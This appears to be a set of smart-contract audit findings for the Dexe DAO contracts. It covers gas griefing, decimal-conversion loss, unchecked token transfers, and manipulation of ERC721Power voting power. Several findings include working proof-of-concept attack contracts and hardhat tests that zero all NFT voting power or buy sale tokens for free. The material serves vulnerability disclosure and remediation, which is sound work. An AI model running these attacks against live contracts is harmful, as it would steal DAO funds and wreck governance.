Using `call()` when the returned data is not required unnecessarily exposes to gas griefing attacks from huge returned data payload. For example:\\n```\\n(bool sent, ) = address(operatorAddress).call{value: msg.value}("");\\nif (!sent) revert Unauthorized();\\n```\\n\\nIs the same as writing:\\n```\\n(bool sent, bytes memory data) = address(operatorAddress).call{value: msg.value}("");\\nif (!sent) revert Unauthorized();\\n```\\n\\nIn both cases the returned data will have to be copied into memory exposing the contract to gas griefing attacks, even though the returned data is not required at all.
Use a low-level call when the returned data is not required, eg:\\n```\\nbool sent;\\nassembly {\\n sent := call(gas(), receiver, amount, 0, 0, 0, 0)\\n}\\nif (!sent) revert Unauthorized();\\n```\\n\\nConsider using ExcessivelySafeCall.
Contracts unnecessarily expose themselves to gas griefing attacks.
```\\n(bool sent, ) = address(operatorAddress).call{value: msg.value}("");\\nif (!sent) revert Unauthorized();\\n```\\n
`TokenSaleProposal::buy` implicitly assumes that buy token has 18 decimals resulting in a potential total loss scenario for Dao Pool
high
`TokenSaleProposalBuy::buy` is called by users looking to buy the DAO token using a pre-approved token. The exchange rate for this sale is pre-assigned for the specific tier. This function internally calls `TokenSaleProposalBuy::_purchaseWithCommission` to transfer funds from the buyer to the gov pool. Part of the transferred funds are used to pay the DexeDAO commission and balance funds are transferred to the `GovPool` address. To do this, `TokenSaleProposalBuy::_sendFunds` is called.\\n```\\n function _sendFunds(address token, address to, uint256 amount) internal {\\n if (token == ETHEREUM_ADDRESS) {\\n (bool success, ) = to.call{value: amount}("");\\n require(success, "TSP: failed to transfer ether");\\n } else {\\n IERC20(token).safeTransferFrom(msg.sender, to, amount.from18(token.decimals())); //@audit -> amount is assumed to be 18 decimals\\n }\\n }\\n```\\n\\nNote that this function assumes that the `amount` of ERC20 token is always 18 decimals. The `DecimalsConverter::from18` function converts from a base decimal (18) to token decimals. Note that the `amount` is directly passed by the buyer and there is no prior normalisation done to ensure the token decimals are converted to 18 decimals before the `_sendFunds` is called.
There are at least 2 options for mitigating this issue:\\nOption 1 - revise the design decision that all token amounts must be sent in 18 decimals even if the underlying token decimals are not 18, to instead that all token amounts should be sent in their native decimals and Dexe will convert everything.\\nOption 2 - keep current design but revert if `amount.from18(token.decimals()) == 0` in L90 or alternatively use the `from18Safe()` function which uses `_convertSafe()` that reverts if the conversion is 0.\\nThe project team should also examine other areas where the same pattern occurs which may have the same vulnerability and where it may be required to revert if the conversion returns 0:\\n`GovUserKeeper` L92, L116, L183\\n`GovPool` L248\\n`TokenSaleProposalWhitelist` L50\\n`ERC721Power` L113, L139\\n`TokenBalance` L35, L62
It is easy to see that for tokens with smaller decimals, eg. USDC with 6 decimals, will cause a total loss to the DAO. In such cases amount is presumed to be 18 decimals & on converting to token decimals(6), this number can round down to 0.\\nProof of Concept:\\nTier 1 allows users to buy DAO token at exchange rate, 1 DAO token = 1 USDC.\\nUser intends to buy 1000 Dao Tokens and calls `TokenSaleProposal::buy` with `buy(1, USDC, 1000*10**6)\\nDexe DAO Comission is assumed 0% for simplicity- > `sendFunds` is called with `sendFunds(USDC, govPool, 1000* 10**6)`\\n`DecimalConverter::from18` function is called on amount with base decimals 18, destination decimals 6: `from18(1000*10**6, 18, 6)`\\nthis gives `1000*10**6/10*(18-6) = 1000/ 10**6` which rounds to 0\\nBuyer can claim 1000 DAO tokens for free. This is a total loss to the DAO.\\nAdd PoC to TokenSaleProposal.test.js:\\nFirst add a new line around L76 to add new purchaseToken3:\\n```\\n let purchaseToken3;\\n```\\n\\nThen add a new line around L528:\\n```\\n purchaseToken3 = await ERC20Mock.new("PurchaseMockedToken3", "PMT3", 6);\\n```\\n\\nThen add a new tier around L712:\\n```\\n {\\n metadata: {\\n name: "tier 9",\\n description: "the ninth tier",\\n },\\n totalTokenProvided: wei(1000),\\n saleStartTime: timeNow.toString(),\\n saleEndTime: (timeNow + 10000).toString(),\\n claimLockDuration: "0",\\n saleTokenAddress: saleToken.address,\\n purchaseTokenAddresses: [purchaseToken3.address],\\n exchangeRates: [PRECISION.times(1).toFixed()],\\n minAllocationPerUser: 0,\\n maxAllocationPerUser: 0,\\n vestingSettings: {\\n vestingPercentage: "0",\\n vestingDuration: "0",\\n cliffPeriod: "0",\\n unlockStep: "0",\\n },\\n participationDetails: [],\\n },\\n```\\n\\nThen add the test itself under the section describe("if added to whitelist", () => {:\\n```\\n it("audit buy implicitly assumes that buy token has 18 decimals resulting in loss to DAO", async () => {\\n await purchaseToken3.approve(tsp.address, wei(1000));\\n\\n // tier9 has the following parameters:\\n // totalTokenProvided : wei(1000)\\n // minAllocationPerUser : 0 (no min)\\n // maxAllocationPerUser : 0 (no max)\\n // exchangeRate : 1 sale token for every 1 purchaseToken\\n //\\n // purchaseToken3 has 6 decimal places\\n //\\n // mint purchase tokens to owner 1000 in 6 decimal places\\n // 1000 000000\\n let buyerInitTokens6Dec = 1000000000;\\n\\n await purchaseToken3.mint(OWNER, buyerInitTokens6Dec);\\n await purchaseToken3.approve(tsp.address, buyerInitTokens6Dec, { from: OWNER });\\n\\n //\\n // start: buyer has bought no tokens\\n let TIER9 = 9;\\n let purchaseView = userViewsToObjects(await tsp.getUserViews(OWNER, [TIER9]))[0].purchaseView;\\n assert.equal(purchaseView.claimTotalAmount, wei(0));\\n\\n // buyer attempts to purchase using 100 purchaseToken3 tokens\\n // purchaseToken3 has 6 decimals but all inputs to Dexe should be in\\n // 18 decimals, so buyer formats input amount to 18 decimals\\n // doing this first to verify it works correctly\\n let buyInput18Dec = wei("100");\\n await tsp.buy(TIER9, purchaseToken3.address, buyInput18Dec);\\n\\n // buyer has bought wei(100) sale tokens\\n purchaseView = userViewsToObjects(await tsp.getUserViews(OWNER, [TIER9]))[0].purchaseView;\\n assert.equal(purchaseView.claimTotalAmount, buyInput18Dec);\\n\\n // buyer has 900 000000 remaining purchaseToken3 tokens\\n assert.equal((await purchaseToken3.balanceOf(OWNER)).toFixed(), "900000000");\\n\\n // next buyer attempts to purchase using 100 purchaseToken3 tokens\\n // but sends input formatted into native 6 decimals\\n // sends 6 decimal input: 100 000000\\n let buyInput6Dec = 100000000;\\n await tsp.buy(TIER9, purchaseToken3.address, buyInput6Dec);\\n\\n // buyer has bought an additional 100000000 sale tokens\\n purchaseView = userViewsToObjects(await tsp.getUserViews(OWNER, [TIER9]))[0].purchaseView;\\n assert.equal(purchaseView.claimTotalAmount, "100000000000100000000");\\n\\n // but the buyer still has 900 000000 remaining purchasetoken3 tokens\\n assert.equal((await purchaseToken3.balanceOf(OWNER)).toFixed(), "900000000");\\n\\n // by sending the input amount formatted to 6 decimal places,\\n // the buyer was able to buy small amounts of the token being sold\\n // for free!\\n });\\n```\\n\\nFinally run the test with: `npx hardhat test --grep "audit buy implicitly assumes that buy token has 18 decimals resulting in loss to DAO"`
```\\n function _sendFunds(address token, address to, uint256 amount) internal {\\n if (token == ETHEREUM_ADDRESS) {\\n (bool success, ) = to.call{value: amount}("");\\n require(success, "TSP: failed to transfer ether");\\n } else {\\n IERC20(token).safeTransferFrom(msg.sender, to, amount.from18(token.decimals())); //@audit -> amount is assumed to be 18 decimals\\n }\\n }\\n```\\n
Attacker can destroy user voting power by setting `ERC721Power::totalPower` and all existing NFTs `currentPower` to 0
high
Attacker can destroy user voting power by setting `ERC721Power::totalPower` & all existing nfts' `currentPower` to 0 via a permission-less attack contract by exploiting a discrepancy ("<" vs "<=") in `ERC721Power` L144 & L172:\\n```\\nfunction recalculateNftPower(uint256 tokenId) public override returns (uint256 newPower) {\\n // @audit execution allowed to continue when\\n // block.timestamp == powerCalcStartTimestamp\\n if (block.timestamp < powerCalcStartTimestamp) {\\n return 0;\\n }\\n // @audit getNftPower() returns 0 when\\n // block.timestamp == powerCalcStartTimestamp\\n newPower = getNftPower(tokenId);\\n\\n NftInfo storage nftInfo = nftInfos[tokenId];\\n\\n // @audit as this is the first update since power\\n // calculation has just started, totalPower will be\\n // subtracted by nft's max power\\n totalPower -= nftInfo.lastUpdate != 0 ? nftInfo.currentPower : getMaxPowerForNft(tokenId);\\n // @audit totalPower += 0 (newPower = 0 in above line)\\n totalPower += newPower;\\n\\n nftInfo.lastUpdate = uint64(block.timestamp);\\n // @audit will set nft's current power to 0\\n nftInfo.currentPower = newPower;\\n}\\n\\nfunction getNftPower(uint256 tokenId) public view override returns (uint256) {\\n // @audit execution always returns 0 when\\n // block.timestamp == powerCalcStartTimestamp\\n if (block.timestamp <= powerCalcStartTimestamp) {\\n return 0;\\n```\\n\\nThis attack has to be run on the exact block that power calculation starts (when block.timestamp == ERC721Power.powerCalcStartTimestamp).
Resolve the discrepancy between `ERC721Power` L144 & L172.
`ERC721Power::totalPower` & all existing nft's `currentPower` are set 0, negating voting using `ERC721Power` since `totalPower` is read when creating the snapshot and `GovUserKeeper::getNftsPowerInTokensBySnapshot()` will return 0 same as if the nft contract didn't exist. Can also negatively affect the ability to create proposals.\\nThis attack is extremely devastating as the individual power of `ERC721Power` nfts can never be increased; it can only decrease over time if the required collateral is not deposited. By setting all nfts' `currentPower = 0` as soon as power calculation starts (block.timestamp == ERC721Power.powerCalcStartTimestamp) the `ERC721Power` contract is effectively completely bricked - there is no way to "undo" this attack unless the nft contract is replaced with a new contract.\\nDexe-DAO can be created using only nfts for voting; in this case this exploit which completely bricks the voting power of all nfts means a new DAO has to be re-deployed since no one can vote as everyone's voting power has been destroyed.\\nProof of Concept: Add attack contract mock/utils/ERC721PowerAttack.sol:\\n```\\n// SPDX-License-Identifier: MIT\\npragma solidity ^0.8.4;\\n\\nimport "../../gov/ERC721/ERC721Power.sol";\\n\\nimport "hardhat/console.sol";\\n\\ncontract ERC721PowerAttack {\\n // this attack can decrease ERC721Power::totalPower by the the true max power of all\\n // the power nfts that exist (to zero), regardless of who owns them, and sets the current\\n // power of all nfts to zero, totally bricking the ERC721Power contract.\\n //\\n // this attack only works when block.timestamp == nftPower.powerCalcStartTimestamp\\n // as it takes advantage of a difference in getNftPower() & recalculateNftPower():\\n //\\n // getNftPower() returns 0 when block.timestamp <= powerCalcStartTimestamp\\n // recalculateNftPower returns 0 when block.timestamp < powerCalcStartTimestamp\\n function attack(\\n address nftPowerAddr,\\n uint256 initialTotalPower,\\n uint256 lastTokenId\\n ) external {\\n ERC721Power nftPower = ERC721Power(nftPowerAddr);\\n\\n // verify attack starts on the correct block\\n require(\\n block.timestamp == nftPower.powerCalcStartTimestamp(),\\n "ERC721PowerAttack: attack requires block.timestamp == nftPower.powerCalcStartTimestamp"\\n );\\n\\n // verify totalPower() correct at starting block\\n require(\\n nftPower.totalPower() == initialTotalPower,\\n "ERC721PowerAttack: incorrect initial totalPower"\\n );\\n\\n // call recalculateNftPower() for every nft, this:\\n // 1) decreases ERC721Power::totalPower by that nft's max power\\n // 2) sets that nft's currentPower = 0\\n for (uint256 i = 1; i <= lastTokenId; ) {\\n require(\\n nftPower.recalculateNftPower(i) == 0,\\n "ERC721PowerAttack: recalculateNftPower() should return 0 for new nft power"\\n );\\n\\n unchecked {\\n ++i;\\n }\\n }\\n\\n require(\\n nftPower.totalPower() == 0,\\n "ERC721PowerAttack: after attack finished totalPower should equal 0"\\n );\\n }\\n}\\n```\\n\\nAdd test harness to ERC721Power.test.js:\\n```\\n describe("audit attacker can manipulate ERC721Power totalPower", () => {\\n it("audit attack 1 sets ERC721Power totalPower & all nft currentPower to 0", async () => {\\n // deploy the ERC721Power nft contract with:\\n // max power of each nft = 100\\n // power reduction 10%\\n // required collateral = 100\\n let maxPowerPerNft = toPercent("100");\\n let requiredCollateral = wei("100");\\n let powerCalcStartTime = (await getCurrentBlockTime()) + 1000;\\n // hack needed to start attack contract on exact block due to hardhat\\n // advancing block.timestamp in the background between function calls\\n let powerCalcStartTime2 = (await getCurrentBlockTime()) + 999;\\n\\n // create power nft contract\\n await deployNft(powerCalcStartTime, maxPowerPerNft, toPercent("10"), requiredCollateral);\\n\\n // ERC721Power::totalPower should be zero as no nfts yet created\\n assert.equal((await nft.totalPower()).toFixed(), toPercent("0").times(1).toFixed());\\n\\n // create the attack contract\\n const ERC721PowerAttack = artifacts.require("ERC721PowerAttack");\\n let attackContract = await ERC721PowerAttack.new();\\n\\n // create 10 power nfts for SECOND\\n await nft.safeMint(SECOND, 1);\\n await nft.safeMint(SECOND, 2);\\n await nft.safeMint(SECOND, 3);\\n await nft.safeMint(SECOND, 4);\\n await nft.safeMint(SECOND, 5);\\n await nft.safeMint(SECOND, 6);\\n await nft.safeMint(SECOND, 7);\\n await nft.safeMint(SECOND, 8);\\n await nft.safeMint(SECOND, 9);\\n await nft.safeMint(SECOND, 10);\\n\\n // verify ERC721Power::totalPower has been increased by max power for all nfts\\n assert.equal((await nft.totalPower()).toFixed(), maxPowerPerNft.times(10).toFixed());\\n\\n // fast forward time to the start of power calculation\\n await setTime(powerCalcStartTime2);\\n\\n // launch the attack\\n await attackContract.attack(nft.address, maxPowerPerNft.times(10).toFixed(), 10);\\n });\\n });\\n```\\n\\nRun attack with: `npx hardhat test --grep "audit attack 1 sets ERC721Power totalPower & all nft currentPower to 0"`
```\\nfunction recalculateNftPower(uint256 tokenId) public override returns (uint256 newPower) {\\n // @audit execution allowed to continue when\\n // block.timestamp == powerCalcStartTimestamp\\n if (block.timestamp < powerCalcStartTimestamp) {\\n return 0;\\n }\\n // @audit getNftPower() returns 0 when\\n // block.timestamp == powerCalcStartTimestamp\\n newPower = getNftPower(tokenId);\\n\\n NftInfo storage nftInfo = nftInfos[tokenId];\\n\\n // @audit as this is the first update since power\\n // calculation has just started, totalPower will be\\n // subtracted by nft's max power\\n totalPower -= nftInfo.lastUpdate != 0 ? nftInfo.currentPower : getMaxPowerForNft(tokenId);\\n // @audit totalPower += 0 (newPower = 0 in above line)\\n totalPower += newPower;\\n\\n nftInfo.lastUpdate = uint64(block.timestamp);\\n // @audit will set nft's current power to 0\\n nftInfo.currentPower = newPower;\\n}\\n\\nfunction getNftPower(uint256 tokenId) public view override returns (uint256) {\\n // @audit execution always returns 0 when\\n // block.timestamp == powerCalcStartTimestamp\\n if (block.timestamp <= powerCalcStartTimestamp) {\\n return 0;\\n```\\n
A malicious DAO Pool can create a token sale tier without actually transferring any DAO tokens
high
`TokenSaleProposalCreate::createTier` is called by a DAO Pool owner to create a new token sale tier. A fundamental prerequisite for creating a tier is that the DAO Pool owner must transfer the `totalTokenProvided` amount of DAO tokens to the `TokenSaleProposal`.\\nCurrent implementation implements a low-level call to transfer tokens from `msg.sender(GovPool)` to `TokenSaleProposal` contract. However, the implementation fails to validate the token balances after the transfer is successful. We notice a `dev` comment stating "return value is not checked intentionally" - even so, this vulnerability is not related to checking return `status` but to verifying the contract balances before & after the call.\\n```\\nfunction createTier(\\n mapping(uint256 => ITokenSaleProposal.Tier) storage tiers,\\n uint256 newTierId,\\n ITokenSaleProposal.TierInitParams memory _tierInitParams\\n ) external {\\n\\n // rest of code.\\n /// @dev return value is not checked intentionally\\n > tierInitParams.saleTokenAddress.call(\\n abi.encodeWithSelector(\\n IERC20.transferFrom.selector,\\n msg.sender,\\n address(this),\\n totalTokenProvided\\n )\\n ); //@audit -> no check if the contract balance has increased proportional to the totalTokenProvided\\n }\\n```\\n\\nSince a DAO Pool owner can use any ERC20 as a DAO token, it is possible for a malicious Gov Pool owner to implement a custom ERC20 implementation of a token that overrides the `transferFrom` function. This function can override the standard ERC20 `transferFrom` logic that fakes a successful transfer without actually transferring underlying tokens.
Calculate the contract balance before and after the low-level call and verify if the account balance increases by `totalTokenProvided`. Please be mindful that this check is only valid for non-fee-on-transfer tokens. For fee-on-transfer tokens, the balance increase needs to be further adjusted for the transfer fees. Example code for non-free-on-transfer-tokens:\\n```\\n // transfer sale tokens to TokenSaleProposal and validate the transfer\\n IERC20 saleToken = IERC20(_tierInitParams.saleTokenAddress);\\n\\n // record balance before transfer in 18 decimals\\n uint256 balanceBefore18 = saleToken.balanceOf(address(this)).to18(_tierInitParams.saleTokenAddress);\\n\\n // perform the transfer\\n saleToken.safeTransferFrom(\\n msg.sender,\\n address(this),\\n _tierInitParams.totalTokenProvided.from18Safe(_tierInitParams.saleTokenAddress)\\n );\\n\\n // record balance after the transfer in 18 decimals\\n uint256 balanceAfter18 = saleToken.balanceOf(address(this)).to18(_tierInitParams.saleTokenAddress);\\n\\n // verify that the transfer has actually occured to protect users from malicious\\n // sale tokens that don't actually send the tokens for the token sale\\n require(balanceAfter18 - balanceBefore18 == _tierInitParams.totalTokenProvided,\\n "TSP: token sale proposal creation received incorrect amount of tokens"\\n );\\n```\\n
A fake tier can be created without the proportionate amount of DAO Pool token balance in the `TokenSaleProposal` contract. Naive users can participate in such a token sale assuming their DAO token claims will be honoured at a future date. Since the pool has insufficient token balance, any attempts to claim the DAO pool tokens can lead to a permanent DOS.
```\\nfunction createTier(\\n mapping(uint256 => ITokenSaleProposal.Tier) storage tiers,\\n uint256 newTierId,\\n ITokenSaleProposal.TierInitParams memory _tierInitParams\\n ) external {\\n\\n // rest of code.\\n /// @dev return value is not checked intentionally\\n > tierInitParams.saleTokenAddress.call(\\n abi.encodeWithSelector(\\n IERC20.transferFrom.selector,\\n msg.sender,\\n address(this),\\n totalTokenProvided\\n )\\n ); //@audit -> no check if the contract balance has increased proportional to the totalTokenProvided\\n }\\n```\\n
Attacker can at anytime dramatically lower `ERC721Power::totalPower` close to 0
high
Attacker can at anytime dramatically lower `ERC721Power::totalPower` close to 0 using a permission-less attack contract by taking advantage of being able to call `ERC721Power::recalculateNftPower()` & `getNftPower()` for non-existent nfts:\\n```\\nfunction getNftPower(uint256 tokenId) public view override returns (uint256) {\\n if (block.timestamp <= powerCalcStartTimestamp) {\\n return 0;\\n }\\n\\n // @audit 0 for non-existent tokenId\\n uint256 collateral = nftInfos[tokenId].currentCollateral;\\n\\n // Calculate the minimum possible power based on the collateral of the nft\\n // @audit returns default maxPower for non-existent tokenId\\n uint256 maxNftPower = getMaxPowerForNft(tokenId);\\n uint256 minNftPower = maxNftPower.ratio(collateral, getRequiredCollateralForNft(tokenId));\\n minNftPower = maxNftPower.min(minNftPower);\\n\\n // Get last update and current power. Or set them to default if it is first iteration\\n // @audit both 0 for non-existent tokenId\\n uint64 lastUpdate = nftInfos[tokenId].lastUpdate;\\n uint256 currentPower = nftInfos[tokenId].currentPower;\\n\\n if (lastUpdate == 0) {\\n lastUpdate = powerCalcStartTimestamp;\\n // @audit currentPower set to maxNftPower which\\n // is just the default maxPower even for non-existent tokenId!\\n currentPower = maxNftPower;\\n }\\n\\n // Calculate reduction amount\\n uint256 powerReductionPercent = reductionPercent * (block.timestamp - lastUpdate);\\n uint256 powerReduction = currentPower.min(maxNftPower.percentage(powerReductionPercent));\\n uint256 newPotentialPower = currentPower - powerReduction;\\n\\n // @audit returns newPotentialPower slightly reduced\\n // from maxPower for non-existent tokenId\\n if (minNftPower <= newPotentialPower) {\\n return newPotentialPower;\\n }\\n\\n if (minNftPower <= currentPower) {\\n return minNftPower;\\n }\\n\\n return currentPower;\\n}\\n\\nfunction recalculateNftPower(uint256 tokenId) public override returns (uint256 newPower) {\\n if (block.timestamp < powerCalcStartTimestamp) {\\n return 0;\\n }\\n\\n // @audit newPower > 0 for non-existent tokenId\\n newPower = getNftPower(tokenId);\\n\\n NftInfo storage nftInfo = nftInfos[tokenId];\\n\\n // @audit as this is the first update since\\n // tokenId doesn't exist, totalPower will be\\n // subtracted by nft's max power\\n totalPower -= nftInfo.lastUpdate != 0 ? nftInfo.currentPower : getMaxPowerForNft(tokenId);\\n // @audit then totalPower is increased by newPower where:\\n // 0 < newPower < maxPower hence net decrease to totalPower\\n totalPower += newPower;\\n\\n nftInfo.lastUpdate = uint64(block.timestamp);\\n nftInfo.currentPower = newPower;\\n}\\n```\\n
`ERC721Power::recalculateNftPower()` should revert when called for non-existent nfts.
`ERC721Power::totalPower` lowered to near 0. This can be used to artificially increase voting power since `totalPower` is read when creating the snapshot and is used as the divisor in `GovUserKeeper::getNftsPowerInTokensBySnapshot()`.\\nThis attack is pretty devastating as `ERC721Power::totalPower` can never be increased since the `currentPower` of individual nfts can only ever be decreased; there is no way to "undo" this attack unless the nft contract is replaced with a new contract.\\nProof of Concept: Add attack contract mock/utils/ERC721PowerAttack.sol:\\n```\\n// SPDX-License-Identifier: MIT\\npragma solidity ^0.8.4;\\n\\nimport "../../gov/ERC721/ERC721Power.sol";\\n\\nimport "hardhat/console.sol";\\n\\ncontract ERC721PowerAttack {\\n // this attack can decrease ERC721Power::totalPower close to 0\\n //\\n // this attack works when block.timestamp > nftPower.powerCalcStartTimestamp\\n // by taking advantage calling recalculateNftPower for non-existent nfts\\n function attack2(\\n address nftPowerAddr,\\n uint256 initialTotalPower,\\n uint256 lastTokenId,\\n uint256 attackIterations\\n ) external {\\n ERC721Power nftPower = ERC721Power(nftPowerAddr);\\n\\n // verify attack starts on the correct block\\n require(\\n block.timestamp > nftPower.powerCalcStartTimestamp(),\\n "ERC721PowerAttack: attack2 requires block.timestamp > nftPower.powerCalcStartTimestamp"\\n );\\n\\n // verify totalPower() correct at starting block\\n require(\\n nftPower.totalPower() == initialTotalPower,\\n "ERC721PowerAttack: incorrect initial totalPower"\\n );\\n\\n // output totalPower before attack\\n console.log(nftPower.totalPower());\\n\\n // keep calling recalculateNftPower() for non-existent nfts\\n // this lowers ERC721Power::totalPower() every time\\n // can't get it to 0 due to underflow but can get close enough\\n for (uint256 i; i < attackIterations; ) {\\n nftPower.recalculateNftPower(++lastTokenId);\\n unchecked {\\n ++i;\\n }\\n }\\n\\n // output totalPower after attack\\n console.log(nftPower.totalPower());\\n\\n // original totalPower : 10000000000000000000000000000\\n // current totalPower : 900000000000000000000000000\\n require(\\n nftPower.totalPower() == 900000000000000000000000000,\\n "ERC721PowerAttack: after attack finished totalPower should equal 900000000000000000000000000"\\n );\\n }\\n}\\n```\\n\\nAdd test harness to ERC721Power.test.js:\\n```\\n describe("audit attacker can manipulate ERC721Power totalPower", () => {\\n it("audit attack 2 dramatically lowers ERC721Power totalPower", async () => {\\n // deploy the ERC721Power nft contract with:\\n // max power of each nft = 100\\n // power reduction 10%\\n // required collateral = 100\\n let maxPowerPerNft = toPercent("100");\\n let requiredCollateral = wei("100");\\n let powerCalcStartTime = (await getCurrentBlockTime()) + 1000;\\n\\n // create power nft contract\\n await deployNft(powerCalcStartTime, maxPowerPerNft, toPercent("10"), requiredCollateral);\\n\\n // ERC721Power::totalPower should be zero as no nfts yet created\\n assert.equal((await nft.totalPower()).toFixed(), toPercent("0").times(1).toFixed());\\n\\n // create the attack contract\\n const ERC721PowerAttack = artifacts.require("ERC721PowerAttack");\\n let attackContract = await ERC721PowerAttack.new();\\n\\n // create 10 power nfts for SECOND\\n await nft.safeMint(SECOND, 1);\\n await nft.safeMint(SECOND, 2);\\n await nft.safeMint(SECOND, 3);\\n await nft.safeMint(SECOND, 4);\\n await nft.safeMint(SECOND, 5);\\n await nft.safeMint(SECOND, 6);\\n await nft.safeMint(SECOND, 7);\\n await nft.safeMint(SECOND, 8);\\n await nft.safeMint(SECOND, 9);\\n await nft.safeMint(SECOND, 10);\\n\\n // verify ERC721Power::totalPower has been increased by max power for all nfts\\n assert.equal((await nft.totalPower()).toFixed(), maxPowerPerNft.times(10).toFixed());\\n\\n // fast forward time to just after the start of power calculation\\n await setTime(powerCalcStartTime);\\n\\n // launch the attack\\n await attackContract.attack2(nft.address, maxPowerPerNft.times(10).toFixed(), 10, 91);\\n });\\n });\\n```\\n\\nRun attack with: `npx hardhat test --grep "audit attack 2 dramatically lowers ERC721Power totalPower"`
```\\nfunction getNftPower(uint256 tokenId) public view override returns (uint256) {\\n if (block.timestamp <= powerCalcStartTimestamp) {\\n return 0;\\n }\\n\\n // @audit 0 for non-existent tokenId\\n uint256 collateral = nftInfos[tokenId].currentCollateral;\\n\\n // Calculate the minimum possible power based on the collateral of the nft\\n // @audit returns default maxPower for non-existent tokenId\\n uint256 maxNftPower = getMaxPowerForNft(tokenId);\\n uint256 minNftPower = maxNftPower.ratio(collateral, getRequiredCollateralForNft(tokenId));\\n minNftPower = maxNftPower.min(minNftPower);\\n\\n // Get last update and current power. Or set them to default if it is first iteration\\n // @audit both 0 for non-existent tokenId\\n uint64 lastUpdate = nftInfos[tokenId].lastUpdate;\\n uint256 currentPower = nftInfos[tokenId].currentPower;\\n\\n if (lastUpdate == 0) {\\n lastUpdate = powerCalcStartTimestamp;\\n // @audit currentPower set to maxNftPower which\\n // is just the default maxPower even for non-existent tokenId!\\n currentPower = maxNftPower;\\n }\\n\\n // Calculate reduction amount\\n uint256 powerReductionPercent = reductionPercent * (block.timestamp - lastUpdate);\\n uint256 powerReduction = currentPower.min(maxNftPower.percentage(powerReductionPercent));\\n uint256 newPotentialPower = currentPower - powerReduction;\\n\\n // @audit returns newPotentialPower slightly reduced\\n // from maxPower for non-existent tokenId\\n if (minNftPower <= newPotentialPower) {\\n return newPotentialPower;\\n }\\n\\n if (minNftPower <= currentPower) {\\n return minNftPower;\\n }\\n\\n return currentPower;\\n}\\n\\nfunction recalculateNftPower(uint256 tokenId) public override returns (uint256 newPower) {\\n if (block.timestamp < powerCalcStartTimestamp) {\\n return 0;\\n }\\n\\n // @audit newPower > 0 for non-existent tokenId\\n newPower = getNftPower(tokenId);\\n\\n NftInfo storage nftInfo = nftInfos[tokenId];\\n\\n // @audit as this is the first update since\\n // tokenId doesn't exist, totalPower will be\\n // subtracted by nft's max power\\n totalPower -= nftInfo.lastUpdate != 0 ? nftInfo.currentPower : getMaxPowerForNft(tokenId);\\n // @audit then totalPower is increased by newPower where:\\n // 0 < newPower < maxPower hence net decrease to totalPower\\n totalPower += newPower;\\n\\n nftInfo.lastUpdate = uint64(block.timestamp);\\n nftInfo.currentPower = newPower;\\n}\\n```\\n
`GovPool::delegateTreasury` does not verify transfer of tokens and NFTs to delegatee leading to potential voting manipulation
high
`GovPool::delegateTreasury` transfers ERC20 tokens & specific nfts from DAO treasury to `govUserKeeper`. Based on this transfer, the `tokenBalance` and `nftBalance` of the delegatee is increased. This allows a delegatee to use this delegated voting power to vote in critical proposals.\\nAs the following snippet of `GovPool::delegateTreasury` function shows, there is no verification that the tokens and nfts are actually transferred to the `govUserKeeper`. It is implicitly assumed that a successful transfer is completed and subsequently, the voting power of the delegatee is increased.\\n```\\n function delegateTreasury(\\n address delegatee,\\n uint256 amount,\\n uint256[] calldata nftIds\\n ) external override onlyThis {\\n require(amount > 0 || nftIds.length > 0, "Gov: empty delegation");\\n require(getExpertStatus(delegatee), "Gov: delegatee is not an expert");\\n\\n _unlock(delegatee);\\n\\n if (amount != 0) {\\n address token = _govUserKeeper.tokenAddress();\\n\\n > IERC20(token).transfer(address(_govUserKeeper), amount.from18(token.decimals())); //@audit no check if tokens are actually transferred\\n\\n _govUserKeeper.delegateTokensTreasury(delegatee, amount);\\n }\\n\\n if (nftIds.length != 0) {\\n IERC721 nft = IERC721(_govUserKeeper.nftAddress());\\n\\n for (uint256 i; i < nftIds.length; i++) {\\n > nft.safeTransferFrom(address(this), address(_govUserKeeper), nftIds[i]); //-n no check if nft's are actually transferred\\n }\\n\\n _govUserKeeper.delegateNftsTreasury(delegatee, nftIds);\\n }\\n\\n _revoteDelegated(delegatee, VoteType.TreasuryVote);\\n\\n emit DelegatedTreasury(delegatee, amount, nftIds, true);\\n }\\n```\\n\\nThis could lead to a dangerous situation where a malicious DAO treasury can increase voting power manifold while actually transferring tokens only once (or even, not transfer at all). This breaks the invariance that the total accounting balances in `govUserKeeper` contract must match the actual token balances in that contract.
Since DEXE starts out with a trustless assumption that does not give any special trust privileges to a DAO treasury, it is always prudent to follow the "trust but verify" approach when it comes to non-standard tokens, both ERC20 and ERC721. To that extent, consider adding verification of token & nft balance increase before/after token transfer.
Since both the ERC20 and ERC721 token implementations are controlled by the DAO, and since we are dealing with upgradeable token contracts, there is a potential rug-pull vector created by the implicit transfer assumption above.
```\\n function delegateTreasury(\\n address delegatee,\\n uint256 amount,\\n uint256[] calldata nftIds\\n ) external override onlyThis {\\n require(amount > 0 || nftIds.length > 0, "Gov: empty delegation");\\n require(getExpertStatus(delegatee), "Gov: delegatee is not an expert");\\n\\n _unlock(delegatee);\\n\\n if (amount != 0) {\\n address token = _govUserKeeper.tokenAddress();\\n\\n > IERC20(token).transfer(address(_govUserKeeper), amount.from18(token.decimals())); //@audit no check if tokens are actually transferred\\n\\n _govUserKeeper.delegateTokensTreasury(delegatee, amount);\\n }\\n\\n if (nftIds.length != 0) {\\n IERC721 nft = IERC721(_govUserKeeper.nftAddress());\\n\\n for (uint256 i; i < nftIds.length; i++) {\\n > nft.safeTransferFrom(address(this), address(_govUserKeeper), nftIds[i]); //-n no check if nft's are actually transferred\\n }\\n\\n _govUserKeeper.delegateNftsTreasury(delegatee, nftIds);\\n }\\n\\n _revoteDelegated(delegatee, VoteType.TreasuryVote);\\n\\n emit DelegatedTreasury(delegatee, amount, nftIds, true);\\n }\\n```\\n
Voting to change `RewardsInfo::voteRewardsCoefficient` has an unintended side-effect of retrospectively changing voting rewards for active proposals
medium
